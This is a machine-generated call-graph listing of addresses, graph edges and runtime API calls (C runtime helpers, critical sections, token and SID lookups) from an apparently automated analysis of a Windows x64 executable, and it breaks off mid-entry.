7ff7333afad0 18745->18837 18747 7ff7333a35c4 18746->18747 18748 7ff7333a35ae 18746->18748 18751 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 18747->18751 18763 7ff7333a3604 18747->18763 18749 7ff7333a4492 18748->18749 18750 7ff7333a4503 18748->18750 18748->18763 18752 7ff7333a4498 18749->18752 18753 7ff7333a452d 18749->18753 18754 7ff7333a4508 18750->18754 18755 7ff7333a455c 18750->18755 18751->18763 18756 7ff7333a44cc 18752->18756 18757 7ff7333a449d 18752->18757 18760 7ff7333a132c 38 API calls 18753->18760 18758 7ff7333a450a 18754->18758 18759 7ff7333a453d 18754->18759 18761 7ff7333a4573 18755->18761 18762 7ff7333a4566 18755->18762 18767 7ff7333a456b 18755->18767 18764 7ff7333a44a3 18756->18764 18756->18767 18757->18761 18757->18764 18771 7ff7333a4519 18758->18771 18775 7ff7333a44ac 18758->18775 18765 7ff7333a0f1c 38 API calls 18759->18765 18779 7ff7333a44c7 18760->18779 18768 7ff7333a5158 45 API calls 18761->18768 18762->18753 18762->18767 18763->18710 18769 7ff7333a44de 18764->18769 18764->18775 18764->18779 18765->18779 18766 7ff7333a4c04 47 API calls 18766->18779 18770 7ff7333a173c 38 API calls 18767->18770 18781 7ff7333a459c 18767->18781 18768->18779 18772 7ff7333a4f40 46 API calls 18769->18772 18769->18781 18770->18779 18771->18753 18773 7ff7333a451e 18771->18773 18772->18779 18777 7ff7333a5004 37 API calls 18773->18777 18773->18781 18774 7ff73339bb10 _log10_special 8 API calls 18776 7ff7333a4896 18774->18776 18775->18766 18775->18781 18776->18710 18777->18779 18778 7ff7333a5270 45 API calls 18782 7ff7333a4788 18778->18782 18779->18778 18779->18781 18779->18782 18780 7ff7333afad0 46 API calls 18780->18782 18781->18774 18782->18780 18782->18781 19003 7ff7333a05a0 18783->19003 18787 7ff7333a4c2a 18786->18787 18849 7ff7333a0158 18787->18849 18792 7ff7333a4d6f 18794 7ff7333a5270 45 API calls 18792->18794 18795 7ff7333a4dfd 18792->18795 18793 7ff7333a5270 45 API calls 18793->18792 18794->18795 18795->18742 18799 7ff7333a4f75 18796->18799 18797 7ff7333a4fba 18797->18742 18798 7ff7333a4f93 18801 7ff7333afad0 46 API calls 18798->18801 18799->18797 18799->18798 18800 7ff7333a5270 45 API calls 18799->18800 18800->18798 18801->18797 18805 7ff7333a5025 18802->18805 18803 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 18804 7ff7333a5056 18803->18804 18804->18742 18805->18803 18805->18804 18807 7ff7333a135f 18806->18807 18808 7ff7333a138e 18807->18808 18811 7ff7333a144b 18807->18811 18809 7ff7333a13cb 18808->18809 18976 7ff7333a0200 18808->18976 18809->18742 18812 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 18811->18812 18812->18809 18814 7ff7333a0f4f 18813->18814 18815 7ff7333a0f7e 18814->18815 18817 7ff7333a103b 18814->18817 18816 7ff7333a0200 12 API calls 18815->18816 18819 7ff7333a0fbb 18815->18819 18816->18819 18818 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 18817->18818 18818->18819 18819->18742 18821 7ff7333a519b 18820->18821 18823 7ff7333a519f __crtLCMapStringW 18821->18823 18984 7ff7333a51f4 18821->18984 18823->18742 18825 7ff7333a176f 18824->18825 18826 7ff7333a179e 18825->18826 18828 7ff7333a185b 18825->18828 18827 7ff7333a0200 12 API calls 18826->18827 18830 7ff7333a17db 18826->18830 18827->18830 18829 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 18828->18829 18829->18830 18830->18742 18832 7ff7333a5287 18831->18832 18988 7ff7333aea80 18832->18988 18839 7ff7333afb01 18837->18839 18846 7ff7333afb0f 18837->18846 18838 7ff7333afb2f 18841 7ff7333afb40 18838->18841 18842 7ff7333afb67 18838->18842 18839->18838 18840 7ff7333a5270 45 API calls 18839->18840 18839->18846 18840->18838 18996 7ff7333b1310 18841->18996 18844 7ff7333afb91 18842->18844 18845 7ff7333afbf2 18842->18845 18842->18846 18844->18846 18848 7ff7333b0b10 _fread_nolock MultiByteToWideChar 18844->18848 18847 7ff7333b0b10 _fread_nolock MultiByteToWideChar 18845->18847 18846->18745 18847->18846 18848->18846 18850 7ff7333a018f 18849->18850 18851 7ff7333a017e 18849->18851 18850->18851 18852 7ff7333ae6c4 _fread_nolock 12 API calls 18850->18852 18857 7ff7333af638 18851->18857 18853 7ff7333a01bc 18852->18853 18854 7ff7333a01d0 18853->18854 18855 7ff7333ab464 __free_lconv_mon 11 API calls 18853->18855 18856 7ff7333ab464 __free_lconv_mon 11 API calls 18854->18856 18855->18854 18856->18851 18858 7ff7333af655 18857->18858 18859 7ff7333af688 18857->18859 18860 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 18858->18860 18859->18858 18861 7ff7333af6ba 18859->18861 18869 7ff7333a4d4d 18860->18869 18866 7ff7333af7cd 18861->18866 18874 7ff7333af702 18861->18874 18862 7ff7333af8bf 18903 7ff7333aeb24 18862->18903 18864 7ff7333af885 18896 7ff7333aeebc 18864->18896 18866->18862 18866->18864 18867 7ff7333af854 18866->18867 18868 7ff7333af817 18866->18868 18871 7ff7333af80d 18866->18871 18889 7ff7333af19c 18867->18889 18879 7ff7333af3cc 18868->18879 18869->18792 18869->18793 18871->18864 18873 7ff7333af812 18871->18873 18873->18867 18873->18868 18874->18869 18875 7ff7333ab3ac __std_exception_copy 37 API calls 18874->18875 18876 7ff7333af7ba 18875->18876 18876->18869 18877 7ff7333ab844 _isindst 17 API calls 18876->18877 18878 7ff7333af91c 18877->18878 18912 7ff7333b531c 18879->18912 18883 7ff7333af474 18884 7ff7333af4c9 18883->18884 18886 7ff7333af494 18883->18886 18888 7ff7333af478 18883->18888 18965 7ff7333aefb8 18884->18965 18886->18886 18961 7ff7333af274 18886->18961 18888->18869 18890 7ff7333b531c 38 API calls 18889->18890 18891 7ff7333af1e6 18890->18891 18892 7ff7333b4d64 37 API calls 18891->18892 18893 7ff7333af236 18892->18893 18894 7ff7333af23a 18893->18894 18895 7ff7333af274 45 API calls 18893->18895 18894->18869 18895->18894 18897 7ff7333b531c 38 API calls 18896->18897 18898 7ff7333aef07 18897->18898 18899 7ff7333b4d64 37 API calls 18898->18899 18900 7ff7333aef5f 18899->18900 18901 7ff7333aef63 18900->18901 18902 7ff7333aefb8 45 API calls 18900->18902 18901->18869 18902->18901 18904 7ff7333aeb69 18903->18904 18905 7ff7333aeb9c 18903->18905 18906 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 18904->18906 18907 7ff7333aebb4 18905->18907 18909 7ff7333aec35 18905->18909 18911 7ff7333aeb95 memcpy_s 18906->18911 18908 7ff7333aeebc 46 API calls 18907->18908 18908->18911 18910 7ff7333a5270 45 API calls 18909->18910 18909->18911 18910->18911 18911->18869 18913 7ff7333b536f fegetenv 18912->18913 18914 7ff7333b909c 37 API calls 18913->18914 18920 7ff7333b53c2 18914->18920 18915 7ff7333b53ef 18919 7ff7333ab3ac __std_exception_copy 37 API calls 18915->18919 18916 7ff7333b54b2 18917 7ff7333b909c 37 API calls 18916->18917 18918 7ff7333b54dc 18917->18918 18923 7ff7333b909c 37 API calls 18918->18923 18924 7ff7333b546d 18919->18924 18920->18916 18921 7ff7333b53dd 18920->18921 18922 7ff7333b548c 18920->18922 18921->18915 18921->18916 18927 7ff7333ab3ac __std_exception_copy 37 API calls 18922->18927 18925 7ff7333b54ed 18923->18925 18926 7ff7333b6594 18924->18926 18932 7ff7333b5475 18924->18932 18928 7ff7333b9290 20 API calls 18925->18928 18929 7ff7333ab844 _isindst 17 API calls 18926->18929 18927->18924 18930 7ff7333b5556 memcpy_s 18928->18930 18931 7ff7333b65a9 18929->18931 18935 7ff7333b5597 memcpy_s 18930->18935 18936 7ff7333b58ff memcpy_s 18930->18936 18941 7ff7333a5e48 _get_daylight 11 API calls 18930->18941 18933 7ff73339bb10 _log10_special 8 API calls 18932->18933 18934 7ff7333af419 18933->18934 18957 7ff7333b4d64 18934->18957 18953 7ff7333b59f3 memcpy_s 18935->18953 18954 7ff7333b5edb memcpy_s 18935->18954 18937 7ff7333b5c3f 18938 7ff7333b4e80 37 API calls 18937->18938 18943 7ff7333b6357 18938->18943 18939 7ff7333b5beb 18939->18937 18940 7ff7333b65ac memcpy_s 37 API calls 18939->18940 18940->18937 18942 7ff7333b59d0 18941->18942 18944 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 18942->18944 18945 7ff7333b65ac memcpy_s 37 API calls 18943->18945 18949 7ff7333b63b2 18943->18949 18944->18935 18945->18949 18946 7ff7333b6538 18947 7ff7333b909c 37 API calls 18946->18947 18947->18932 18948 7ff7333a5e48 11 API calls _get_daylight 18948->18953 18949->18946 18951 7ff7333b4e80 37 API calls 18949->18951 18956 7ff7333b65ac memcpy_s 37 API calls 18949->18956 18950 7ff7333a5e48 11 API calls _get_daylight 18950->18954 18951->18949 18952 7ff7333ab824 37 API calls _invalid_parameter_noinfo 18952->18954 18953->18939 18953->18948 18955 7ff7333ab824 37 API calls _invalid_parameter_noinfo 18953->18955 18954->18937 18954->18939 18954->18950 18954->18952 18955->18953 18956->18949 18958 7ff7333b4d83 18957->18958 18959 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 18958->18959 18960 7ff7333b4dae memcpy_s 18958->18960 18959->18960 18960->18883 18962 7ff7333af2a0 memcpy_s 18961->18962 18962->18962 18963 7ff7333a5270 45 API calls 18962->18963 18964 7ff7333af35a memcpy_s 18962->18964 18963->18964 18964->18888 18966 7ff7333aeff3 18965->18966 18971 7ff7333af040 memcpy_s 18965->18971 18967 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 18966->18967 18968 7ff7333af01f 18967->18968 18968->18888 18969 7ff7333af0ab 18970 7ff7333ab3ac __std_exception_copy 37 API calls 18969->18970 18975 7ff7333af0ed memcpy_s 18970->18975 18971->18969 18972 7ff7333a5270 45 API calls 18971->18972 18972->18969 18973 7ff7333ab844 _isindst 17 API calls 18974 7ff7333af198 18973->18974 18975->18973 18977 7ff7333a0237 18976->18977 18983 7ff7333a0226 18976->18983 18978 7ff7333ae6c4 _fread_nolock 12 API calls 18977->18978 18977->18983 18979 7ff7333a0268 18978->18979 18980 7ff7333a027c 18979->18980 18981 7ff7333ab464 __free_lconv_mon 11 API calls 18979->18981 18982 7ff7333ab464 __free_lconv_mon 11 API calls 18980->18982 18981->18980 18982->18983 18983->18809 18985 7ff7333a5212 18984->18985 18987 7ff7333a521a 18984->18987 18986 7ff7333a5270 45 API calls 18985->18986 18986->18987 18987->18823 18989 7ff7333a52af 18988->18989 18990 7ff7333aea99 18988->18990 18992 7ff7333aeaec 18989->18992 18990->18989 18991 7ff7333b4574 45 API calls 18990->18991 18991->18989 18993 7ff7333aeb05 18992->18993 18994 7ff7333a52bf 18992->18994 18993->18994 18995 7ff7333b38c0 45 API calls 18993->18995 18994->18745 18995->18994 18999 7ff7333b7ff8 18996->18999 19002 7ff7333b805c 18999->19002 19000 7ff73339bb10 _log10_special 8 API calls 19001 7ff7333b132d 19000->19001 19001->18846 19002->19000 19004 7ff7333a05d5 19003->19004 19005 7ff7333a05e7 19003->19005 19006 7ff7333a5e48 _get_daylight 11 API calls 19004->19006 19008 7ff7333a05f5 19005->19008 19012 7ff7333a0631 19005->19012 19007 7ff7333a05da 19006->19007 19009 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 19007->19009 19010 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 19008->19010 19017 7ff7333a05e5 19009->19017 19010->19017 19011 7ff7333a09ad 19014 7ff7333a5e48 _get_daylight 11 API calls 19011->19014 19011->19017 19012->19011 19013 7ff7333a5e48 _get_daylight 11 API calls 19012->19013 19016 7ff7333a09a2 19013->19016 19015 7ff7333a0c41 19014->19015 19018 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 19015->19018 19019 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 19016->19019 19017->18710 19018->19017 19019->19011 19021 7ff7333a57ca 19020->19021 19022 7ff7333a5802 19021->19022 19024 7ff7333a5835 19021->19024 19023 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 19022->19023 19026 7ff7333a582b 19023->19026 19027 7ff7333a00d8 19024->19027 19026->18701 19034 7ff7333a62dc EnterCriticalSection 19027->19034 19036 7ff73339fc5c 19035->19036 19063 7ff73339f9bc 19036->19063 19038 7ff73339fc75 19038->18348 19075 7ff73339f914 19039->19075 19043 7ff73339be10 19042->19043 19044 7ff733392040 GetCurrentProcessId 19043->19044 19045 7ff733391c60 49 API calls 19044->19045 19046 7ff73339208b 19045->19046 19089 7ff7333a58c4 19046->19089 19050 7ff7333920ec 19051 7ff733391c60 49 API calls 19050->19051 19052 7ff733392106 19051->19052 19129 7ff733391cc0 19052->19129 19055 7ff73339bb10 _log10_special 8 API calls 19056 7ff733392120 19055->19056 19056->18387 19058 7ff73339f671 19057->19058 19062 7ff733391b69 19057->19062 19059 7ff7333a5e48 _get_daylight 11 API calls 19058->19059 19060 7ff73339f676 19059->19060 19061 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 19060->19061 19061->19062 19062->18386 19062->18387 19064 7ff73339fa26 19063->19064 19065 7ff73339f9e6 19063->19065 19064->19065 19067 7ff73339fa32 19064->19067 19066 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 19065->19066 19069 7ff73339fa0d 19066->19069 19074 7ff7333a62dc EnterCriticalSection 19067->19074 19069->19038 19076 7ff73339f93e 19075->19076 19077 7ff733391a00 19075->19077 19076->19077 19078 7ff73339f98a 19076->19078 19079 7ff73339f94d memcpy_s 19076->19079 19077->18356 19077->18357 19088 7ff7333a62dc EnterCriticalSection 19078->19088 19082 7ff7333a5e48 _get_daylight 11 API calls 19079->19082 19084 7ff73339f962 19082->19084 19085 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 19084->19085 19085->19077 19093 7ff7333a591e 19089->19093 19090 7ff7333a5943 19091 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 19090->19091 19106 7ff7333a596d 19091->19106 19092 7ff7333a597f 19140 7ff7333a27b8 19092->19140 19093->19090 19093->19092 19096 7ff73339bb10 _log10_special 8 API calls 19098 7ff7333920ca 19096->19098 19097 7ff7333ab464 __free_lconv_mon 11 API calls 19097->19106 19107 7ff7333a60a0 19098->19107 19099 7ff7333a5a5c 19099->19097 19100 7ff7333a5a80 19100->19099 19102 7ff7333a5a8a 19100->19102 19101 7ff7333a5a31 19103 7ff7333ab464 __free_lconv_mon 11 API calls 19101->19103 19105 7ff7333ab464 __free_lconv_mon 11 API calls 19102->19105 19103->19106 19104 7ff7333a5a28 19104->19099 19104->19101 19105->19106 19106->19096 19108 7ff7333ac1c8 _get_daylight 11 API calls 19107->19108 19110 7ff7333a60b7 19108->19110 19109 7ff7333a60bf 19109->19050 19110->19109 19111 7ff7333afe04 _get_daylight 11 API calls 19110->19111 19114 7ff7333a60f7 19110->19114 19112 7ff7333a60ec 19111->19112 19113 7ff7333ab464 __free_lconv_mon 11 API calls 19112->19113 19113->19114 19114->19109 19275 7ff7333afe8c 19114->19275 19117 7ff7333ab844 _isindst 17 API calls 19118 7ff7333a613c 19117->19118 19119 7ff7333afe04 _get_daylight 11 API calls 19118->19119 19120 7ff7333a6189 19119->19120 19121 7ff7333ab464 __free_lconv_mon 11 API calls 19120->19121 19122 7ff7333a6197 19121->19122 19123 7ff7333afe04 _get_daylight 11 API calls 19122->19123 19126 7ff7333a61c1 19122->19126 19125 7ff7333a61b3 19123->19125 19127 7ff7333ab464 __free_lconv_mon 11 API calls 19125->19127 19128 7ff7333a61ca 19126->19128 19284 7ff7333b02e0 19126->19284 19127->19126 19128->19050 19130 7ff733391ccc 19129->19130 19131 7ff733398950 2 API calls 19130->19131 19132 7ff733391cf4 19131->19132 19133 7ff733391cfe 19132->19133 19134 7ff733391d19 19132->19134 19135 7ff733391e00 78 API calls 19133->19135 19289 7ff733391db0 19134->19289 19137 7ff733391d17 19135->19137 19138 7ff73339bb10 _log10_special 8 API calls 19137->19138 19139 7ff733391d40 19138->19139 19139->19055 19141 7ff7333a27f6 19140->19141 19142 7ff7333a27e6 19140->19142 19143 7ff7333a27ff 19141->19143 19150 7ff7333a282d 19141->19150 19145 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 19142->19145 19146 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 19143->19146 19144 7ff7333a2825 19144->19099 19144->19100 19144->19101 19144->19104 19145->19144 19146->19144 19147 7ff7333a5270 45 API calls 19147->19150 19149 7ff7333a2adc 19152 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 19149->19152 19150->19142 19150->19144 19150->19147 19150->19149 19154 7ff7333a3b88 19150->19154 19180 7ff7333a3268 19150->19180 19210 7ff7333a2300 19150->19210 19152->19142 19155 7ff7333a3bca 19154->19155 19156 7ff7333a3c3d 19154->19156 19157 7ff7333a3bd0 19155->19157 19158 7ff7333a3c67 19155->19158 19159 7ff7333a3c42 19156->19159 19160 7ff7333a3c97 19156->19160 19164 7ff7333a3bd5 19157->19164 19167 7ff7333a3ca6 19157->19167 19227 7ff7333a1128 19158->19227 19161 7ff7333a3c44 19159->19161 19162 7ff7333a3c77 19159->19162 19160->19158 19160->19167 19179 7ff7333a3c00 19160->19179 19170 7ff7333a3c53 19161->19170 19172 7ff7333a3be5 19161->19172 19234 7ff7333a0d18 19162->19234 19168 7ff7333a3c18 19164->19168 19164->19172 19164->19179 19177 7ff7333a3cd5 19167->19177 19241 7ff7333a1538 19167->19241 19168->19177 19223 7ff7333a4e6c 19168->19223 19170->19158 19173 7ff7333a3c58 19170->19173 19172->19177 19213 7ff7333a49b0 19172->19213 19175 7ff7333a5004 37 API calls 19173->19175 19173->19177 19174 7ff73339bb10 _log10_special 8 API calls 19176 7ff7333a3f6b 19174->19176 19175->19179 19176->19150 19177->19174 19179->19177 19248 7ff7333af920 19179->19248 19181 7ff7333a3273 19180->19181 19182 7ff7333a3289 19180->19182 19183 7ff7333a3bca 19181->19183 19184 7ff7333a3c3d 19181->19184 19186 7ff7333a32c7 19181->19186 19185 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 19182->19185 19182->19186 19187 7ff7333a3bd0 19183->19187 19188 7ff7333a3c67 19183->19188 19189 7ff7333a3c42 19184->19189 19190 7ff7333a3c97 19184->19190 19185->19186 19186->19150 19195 7ff7333a3bd5 19187->19195 19198 7ff7333a3ca6 19187->19198 19193 7ff7333a1128 38 API calls 19188->19193 19191 7ff7333a3c44 19189->19191 19192 7ff7333a3c77 19189->19192 19190->19188 19190->19198 19208 7ff7333a3c00 19190->19208 19194 7ff7333a3be5 19191->19194 19201 7ff7333a3c53 19191->19201 19196 7ff7333a0d18 38 API calls 19192->19196 19193->19208 19197 7ff7333a49b0 47 API calls 19194->19197 19209 7ff7333a3cd5 19194->19209 19195->19194 19199 7ff7333a3c18 19195->19199 19195->19208 19196->19208 19197->19208 19200 7ff7333a1538 38 API calls 19198->19200 19198->19209 19202 7ff7333a4e6c 47 API calls 19199->19202 19199->19209 19200->19208 19201->19188 19203 7ff7333a3c58 19201->19203 19202->19208 19205 7ff7333a5004 37 API calls 19203->19205 19203->19209 19204 7ff73339bb10 _log10_special 8 API calls 19206 7ff7333a3f6b 19204->19206 19205->19208 19206->19150 19207 7ff7333af920 47 API calls 19207->19208 19208->19207 19208->19209 19209->19204 19258 7ff7333a02ec 19210->19258 19214 7ff7333a49d2 19213->19214 19215 7ff7333a0158 12 API calls 19214->19215 19216 7ff7333a4a1a 19215->19216 19217 7ff7333af638 46 API calls 19216->19217 19218 7ff7333a4aed 19217->19218 19219 7ff7333a5270 45 API calls 19218->19219 19220 7ff7333a4b0f 19218->19220 19219->19220 19221 7ff7333a5270 45 API calls 19220->19221 19222 7ff7333a4b98 19220->19222 19221->19222 19222->19179 19224 7ff7333a4eec 19223->19224 19225 7ff7333a4e84 19223->19225 19224->19179 19225->19224 19226 7ff7333af920 47 API calls 19225->19226 19226->19224 19228 7ff7333a115b 19227->19228 19229 7ff7333a118a 19228->19229 19231 7ff7333a1247 19228->19231 19230 7ff7333a0158 12 API calls 19229->19230 19233 7ff7333a11c7 19229->19233 19230->19233 19232 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 19231->19232 19232->19233 19233->19179 19235 7ff7333a0d4b 19234->19235 19236 7ff7333a0d7a 19235->19236 19238 7ff7333a0e37 19235->19238 19237 7ff7333a0158 12 API calls 19236->19237 19240 7ff7333a0db7 19236->19240 19237->19240 19239 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 19238->19239 19239->19240 19240->19179 19242 7ff7333a156b 19241->19242 19243 7ff7333a159a 19242->19243 19245 7ff7333a1657 19242->19245 19244 7ff7333a0158 12 API calls 19243->19244 19247 7ff7333a15d7 19243->19247 19244->19247 19246 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 19245->19246 19246->19247 19247->19179 19249 7ff7333af948 19248->19249 19250 7ff7333af98d 19249->19250 19251 7ff7333a5270 45 API calls 19249->19251 19252 7ff7333af94d memcpy_s 19249->19252 19257 7ff7333af976 memcpy_s 19249->19257 19250->19252 19254 7ff7333b1a58 WideCharToMultiByte 19250->19254 19250->19257 19251->19250 19252->19179 19253 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 19253->19252 19255 7ff7333afa69 19254->19255 19255->19252 19256 7ff7333afa7e GetLastError 19255->19256 19256->19252 19256->19257 19257->19252 19257->19253 19259 7ff7333a0319 19258->19259 19260 7ff7333a032b 19258->19260 19261 7ff7333a5e48 _get_daylight 11 API calls 19259->19261 19263 7ff7333a0338 19260->19263 19266 7ff7333a0375 19260->19266 19262 7ff7333a031e 19261->19262 19264 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 19262->19264 19265 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 19263->19265 19271 7ff7333a0329 19264->19271 19265->19271 19267 7ff7333a041e 19266->19267 19269 7ff7333a5e48 _get_daylight 11 API calls 19266->19269 19268 7ff7333a5e48 _get_daylight 11 API calls 19267->19268 19267->19271 19270 7ff7333a04c8 19268->19270 19272 7ff7333a0413 19269->19272 19273 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 19270->19273 19271->19150 19274 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 19272->19274 19273->19271 19274->19267 19279 7ff7333afea9 19275->19279 19276 7ff7333afeae 19277 7ff7333a611d 19276->19277 19278 7ff7333a5e48 _get_daylight 11 API calls 19276->19278 19277->19109 19277->19117 19280 7ff7333afeb8 19278->19280 19279->19276 19279->19277 19282 7ff7333afef8 19279->19282 19281 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 19280->19281 19281->19277 19282->19277 19283 7ff7333a5e48 _get_daylight 11 API calls 19282->19283 19283->19280 19285 7ff7333aff7c __crtLCMapStringW 5 API calls 19284->19285 19286 7ff7333b0316 19285->19286 19287 7ff7333b0335 InitializeCriticalSectionAndSpinCount 19286->19287 19288 7ff7333b031b 19286->19288 19287->19288 19288->19126 19290 7ff733391dd6 19289->19290 19293 7ff7333a567c 19290->19293 19292 7ff733391dec 19292->19137 19294 7ff7333a56a6 19293->19294 19295 7ff7333a56de 19294->19295 19297 7ff7333a5711 19294->19297 19296 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 19295->19296 19299 7ff7333a5707 19296->19299 19300 7ff7333a0118 19297->19300 19299->19292 19307 7ff7333a62dc EnterCriticalSection 19300->19307 19309 7ff7333a9181 19308->19309 19310 7ff7333a9194 19308->19310 19311 7ff7333a5e48 _get_daylight 11 API calls 19309->19311 19318 7ff7333a8df8 19310->19318 19313 7ff7333a9186 19311->19313 19315 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 19313->19315 19316 7ff7333a9192 19315->19316 19316->18407 19325 7ff7333b1548 EnterCriticalSection 19318->19325 19327 7ff733397bf1 GetTokenInformation 19326->19327 19328 7ff733397c73 __vcrt_freefls 19326->19328 19329 7ff733397c12 GetLastError 19327->19329 19330 7ff733397c1d 19327->19330 19331 7ff733397c86 CloseHandle 19328->19331 19332 7ff733397c8c 19328->19332 19329->19328 19329->19330 19330->19328 19333 7ff733397c39 GetTokenInformation 19330->19333 19331->19332 19332->18412 19333->19328 19334 7ff733397c5c 19333->19334 19334->19328 19335 7ff733397c66 ConvertSidToStringSidW 19334->19335 19335->19328 19337 7ff73339be10 19336->19337 19338 7ff733392244 GetCurrentProcessId 19337->19338 19339 7ff733391d50 48 API calls 19338->19339 19340 7ff733392295 19339->19340 19341 7ff7333a5b18 48 API calls 19340->19341 19342 7ff7333922d3 19341->19342 19343 7ff733391e00 78 API calls 19342->19343 19344 7ff7333922f1 19343->19344 19348 7ff733398785 19347->19348 19349 7ff7333a5b18 48 API calls 19348->19349 19350 7ff7333987a4 19349->19350 19355 7ff73339761c 19354->19355 19517 7ff73339397a 19516->19517 19518 7ff733398950 2 API calls 19517->19518 19519 7ff73339399f 19518->19519 19523 7ff73339726e 19522->19523 19524 7ff733391c60 49 API calls 19523->19524 19525 7ff733397392 19523->19525 19530 7ff7333972f5 19524->19530 19526 7ff73339bb10 _log10_special 8 API calls 19525->19526 19527 7ff7333973c3 19526->19527 19527->18474 19528 7ff733391c60 49 API calls 19528->19530 19529 7ff733393970 10 API calls 19529->19530 19530->19525 19530->19528 19530->19529 19531 7ff733398950 2 API calls 19530->19531 19534 7ff7333915f3 19533->19534 19535 7ff733391617 19533->19535 19654 7ff733391030 19534->19654 19537 7ff7333939d0 108 API calls 19535->19537 19539 7ff73339162b 19537->19539 19541 7ff733391662 19539->19541 19542 7ff733391633 19539->19542 19582 7ff7333965cb 19581->19582 19584 7ff733396584 19581->19584 19582->18474 19584->19582 19718 7ff7333a5f64 19584->19718 19586 7ff7333935b1 19585->19586 19587 7ff7333938f0 49 API calls 19586->19587 19588 7ff7333935eb 19587->19588 19589 7ff7333938f0 49 API calls 19588->19589 19630 7ff733391c60 49 API calls 19629->19630 19631 7ff733393884 19630->19631 19631->18474 19631->19631 19655 7ff7333939d0 108 API calls 19654->19655 19656 7ff73339106c 19655->19656 19719 7ff7333a5f71 19718->19719 19720 7ff7333a5f9e 19718->19720 19721 7ff7333a5e48 _get_daylight 11 API calls 19719->19721 19728 7ff7333a5f28 19719->19728 19722 7ff7333a5fc1 19720->19722 19723 7ff7333a5fdd 19720->19723 19728->19584 19797 7ff7333a6e88 19796->19797 19798 7ff7333a6eae 19797->19798 19800 7ff7333a6ee1 19797->19800 19799 7ff7333a5e48 _get_daylight 11 API calls 19798->19799 19801 7ff7333a6eb3 19799->19801 19802 7ff7333a6ef4 19800->19802 19803 7ff7333a6ee7 19800->19803 19804 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 19801->19804 19815 7ff7333abb30 19802->19815 19805 7ff7333a5e48 _get_daylight 11 API calls 19803->19805 19807 7ff733393a26 19804->19807 19805->19807 19807->18500 19828 7ff7333b1548 EnterCriticalSection 19815->19828 20188 7ff7333a8834 20187->20188 20191 7ff7333a8310 20188->20191 20190 7ff7333a884d 20190->18510 20192 7ff7333a835a 20191->20192 20193 7ff7333a832b 20191->20193 20201 7ff7333a62dc EnterCriticalSection 20192->20201 20195 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 20193->20195 20197 7ff7333a834b 20195->20197 20197->20190 20203 7ff73339f3c9 20202->20203 20204 7ff73339f39b 20202->20204 20207 7ff73339f3bb 20203->20207 20212 7ff7333a62dc EnterCriticalSection 20203->20212 20205 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 20204->20205 20205->20207 20207->18514 20320 7ff7333957b5 20319->20320 20321 7ff733391c60 49 API calls 20320->20321 20322 7ff7333957f1 20321->20322 20323 7ff7333957fa 20322->20323 20324 7ff73339581d 20322->20324 20593 7ff7333b0bfc 20594 7ff7333b0dee 20593->20594 20596 7ff7333b0c3e _isindst 20593->20596 20595 7ff7333a5e48 _get_daylight 11 API calls 20594->20595 20613 7ff7333b0dde 20595->20613 20596->20594 20599 7ff7333b0cbe _isindst 20596->20599 20597 7ff73339bb10 _log10_special 8 API calls 20598 7ff7333b0e09 20597->20598 20614 7ff7333b7404 20599->20614 20604 7ff7333b0e1a 20606 7ff7333ab844 _isindst 17 API calls 20604->20606 20608 7ff7333b0e2e 20606->20608 20611 7ff7333b0d1b 20611->20613 20639 7ff7333b7448 20611->20639 20613->20597 20615 7ff7333b0cdc 20614->20615 20616 7ff7333b7413 20614->20616 20621 7ff7333b6808 20615->20621 20646 7ff7333b1548 EnterCriticalSection 20616->20646 20622 7ff7333b6811 20621->20622 20623 7ff7333b0cf1 20621->20623 20624 7ff7333a5e48 _get_daylight 11 API calls 20622->20624 20623->20604 20627 7ff7333b6838 20623->20627 20625 7ff7333b6816 20624->20625 20626 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 20625->20626 20626->20623 20628 7ff7333b6841 20627->20628 20629 7ff7333b0d02 20627->20629 20630 7ff7333a5e48 _get_daylight 11 API calls 20628->20630 20629->20604 20633 7ff7333b6868 20629->20633 20631 7ff7333b6846 20630->20631 20632 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 20631->20632 20632->20629 20634 7ff7333b6871 20633->20634 20635 7ff7333b0d13 20633->20635 20636 7ff7333a5e48 _get_daylight 11 API calls 20634->20636 20635->20604 20635->20611 20637 7ff7333b6876 20636->20637 20638 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 20637->20638 20638->20635 20647 7ff7333b1548 EnterCriticalSection 20639->20647 21232 7ff73339c110 21233 7ff73339c120 21232->21233 21249 7ff7333aaae0 21233->21249 21235 7ff73339c12c 21255 7ff73339c418 21235->21255 21237 7ff73339c6fc 7 API calls 21238 7ff73339c1c5 21237->21238 21239 7ff73339c144 _RTC_Initialize 21247 